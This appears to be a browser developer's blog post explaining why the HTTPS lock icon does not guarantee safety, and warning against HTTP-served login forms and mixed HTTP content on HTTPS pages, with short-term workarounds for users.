Quite a bit has been written about the Secure Sockets Layer (SSL) protocol and its successor Transport Layer Security (TLS), so I won't cover the protocols in detail here. The following are good references if you want to get a quick refresher.
Happily, a majority of web users now know to look for the lock icon and the HTTPS in the address line to identify when their connection is secure. Unfortunately, relatively few users understand what security guarantees these protocols provide. Fewer still understand the critical importance of digital certificates to secure connections. In a recent phishing attack, the bad guy used a third-party SSL-hosting server to display the lock icon for his fake banking site. Was the connection secure? Sure. Was it safe? Of course not.
Improving the user-experience around TLS/SSL is a significant challenge: how much can we help the user stay safe without having to explain all this mumbo-jumbo? Or should we try to explain public key cryptography, symmetric key exchange, digital certificates, the role of certification authorities, and more?
All the average user wants to know is: "Will my transaction be safe?"
Here we run into Law of Security #10-- Technology is not a panacea, and TLS/SSL alone can't answer the user's question.
It's easy to fall into the trap of assuming that spoofing fraud only occurs on the web, but there are plenty of "real-world" attacks that work essentially the same way. Examples range from a cashier using a hacked terminal to swipe your credit card, to the ambitious crooks who deployed a phony ATM in a shopping mall to collect card numbers and PIN codes. When was the last time you looked at your ATM and asked it for some ID?
Just because there are no simple solutions doesn't mean we're not working hard on making surfing more Trustworthy, and TLS/SSL will be a part of that. We're doing some interesting work here, which I'll be able to blog about at a later date.
For now, I'd like to point out that security is only as strong as its weakest link. To that end, I want to highlight two very common web-developer mistakes when building TLS/SSL web applications.
Critical Mistake #1: Non-HTTPS Login pages (even if submitting to a HTTPS page).
Most webdevs know that HTTPS is comparatively expensive-- the multistage handshake with multiple roundtrips and cryptographic operations is inherently less performant than straight HTTP. A few years ago, someone got the bright idea that login pages should be served via HTTP to reduce this performance hit.
The thinking goes something like: "Well, since the HTTP POST containing the user's credentials is sent via HTTPS, any man-in-the-middle can't see the data."
And this seemed like a reasonable idea. The practice became even more popular as banks and credit card companies decided that customers should be able to log in directly from the HTTP-delivered homepage. Three of my financial institutions offer this "convenience". One of them even draws little lock icons near the login box and provides a phone number for customers to call so they can convince them that it's safe.
There are two problems with this practice: One fairly obvious, and one slightly less obvious. The first problem is simple: How does the user know that the form is being submitted via HTTPS? Most browsers have no such UI cue. (Pretty much everyone turns off the "Warn when sending unencrypted form data" option within 2 minutes of installing the browser.) Even supposing there was a UI cue that the form was targeted at a HTTPS page, how could the user know that it was going to the right HTTPS page? If the login form was delivered via HTTP, there's no guarantee it hasn't been changed between the server and the client. A bad guy sitting on the wire between the two could simply retarget the POST to submit to a HTTPS site that he controls. Oops.
Think that's bad? There's an even more sneaky attack the bad guy could execute. The event model in HTML is pretty rich, and one of the things it can do is listen for keystroke events. So, the bad guy could simply rewrite the login page HTML to leak keystrokes to a server he controls, every time a key is pressed. Unsecured login form + Man-in-the-Middle+ 5 lines of JScript + Serverside keystroke collector = Bad News.
(Food for thought: The keystroke-sniffing attack gets even worse if your JS can run in the browser chrome, a feature offered by some browsers.)
Critical Mistake #2: Mixing HTTP Content into a HTTPS page
Some HTTPS pages pull in assorted resources over HTTP, which leads to the annoying "This page contains both secure and nonsecure items" prompt. Why does this hassle exist? Is it really so bad if some files get pulled down via HTTP, if the main body of my page is delivered via HTTPS?
The answer is, of course, yes, this is a bad thing. For one thing, it's impossible for the user to tell what parts of the page were delivered securely, and what parts were not. And worse, if a man-in-the-middle can rewrite the HTTP traffic, he can, for instance, rewrite the HTTPS page using standard DHTML. Or, he can scan the page for any information of interest (e.g. a credit card number) and POST that data to a server he controls. Using HTTP-delivered resources on a HTTPS-delivered page pokes holes in your secure channel. Don't do it.
What can we do today?
I hope you will join me in calling on operators of insecure HTTPS sites to correct these mistakes.
In the short term, you may be able to work around these security holes:
- If available, a "Login securely" link might lead to get to an HTTPS login form you can use instead of the form on a HTTP page. Or try visiting the https:// version of the site directly.
- If prompted to download mixed content, always choose "No".
Thought for the week
The so-called "browser wars" have fundamentally changed. It's no longer Microsoft vs. Mozilla vs. Opera et all. Now it's the "good guys" vs. the "bad guys." The "bad guys" are the phishers, malware distributors, and other miscellaneous crooks looking for a quick score at the expense of the browsing public.
We're all in this together.